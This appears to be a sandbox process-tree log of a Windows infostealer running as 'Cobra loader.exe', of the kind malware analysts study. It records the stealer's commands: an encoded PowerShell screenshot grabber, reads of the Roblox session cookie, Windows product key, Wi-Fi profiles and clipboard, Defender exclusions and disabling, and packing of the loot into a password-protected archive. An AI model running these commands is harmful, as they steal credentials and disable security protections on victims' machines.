C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
3⤵
PID:3516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
4⤵
- Command and Scripting Interpreter: PowerShell
PID:3800

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vfklrtx0\vfklrtx0.cmdline"
5⤵
PID:4248

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF6B5.tmp" "c:\Users\Admin\AppData\Local\Temp\vfklrtx0\CSC1093F2822D1441088B287366BB66BA8.TMP"
6⤵
PID:2984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:3256

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:3036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:4624

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:4576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:620

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:60

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:4436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:3968

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:5680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
PID:4496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:6100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
PID:5192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
3⤵
PID:5524

C:\Windows\system32\getmac.exe
getmac
4⤵
PID:5432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI47482\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\ZH4kg.zip" *"
3⤵
PID:5604

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4624

C:\Users\Admin\AppData\Local\Temp\_MEI47482\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI47482\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\ZH4kg.zip" *
4⤵
- Executes dropped EXE
PID:5468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
3⤵
PID:4292

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
4⤵
PID:3704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
3⤵
PID:3716

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
4⤵
PID:5424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:4436

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
3⤵
PID:4412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
4⤵
PID:6000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
PID:2036

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
3⤵
PID:5808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
4⤵
PID:872

C:\Users\Admin\Desktop\Cobra loader.exe
"C:\Users\Admin\Desktop\Cobra loader.exe"
1⤵
- Executes dropped EXE
PID:4424

C:\Users\Admin\Desktop\Cobra loader.exe
"C:\Users\Admin\Desktop\Cobra loader.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2432

C:\Users\Admin\Desktop\Cobra loader.exe
"C:\Users\Admin\Desktop\Cobra loader.exe"
1⤵
- Executes dropped EXE
PID:5652

C:\Users\Admin\Desktop\Cobra loader.exe
"C:\Users\Admin\Desktop\Cobra loader.exe"
2⤵
- Executes dropped EXE
PID:5684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Cobra loader.exe'"
3⤵
PID:4092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Cobra loader.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:4752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
3⤵
PID:2852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
PID:1800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏‎ ‏ .scr'"
3⤵
PID:2328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏‎ ‏ .scr'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:2660

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:5580

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:1056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
3⤵
PID:4560

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
4⤵
PID:3916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
PID:1688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
PID:5644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:1368

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:6000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5860

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:2748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
3⤵
PID:2928

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:3664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
3⤵
PID:5068

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:3564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
3⤵
PID:4988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
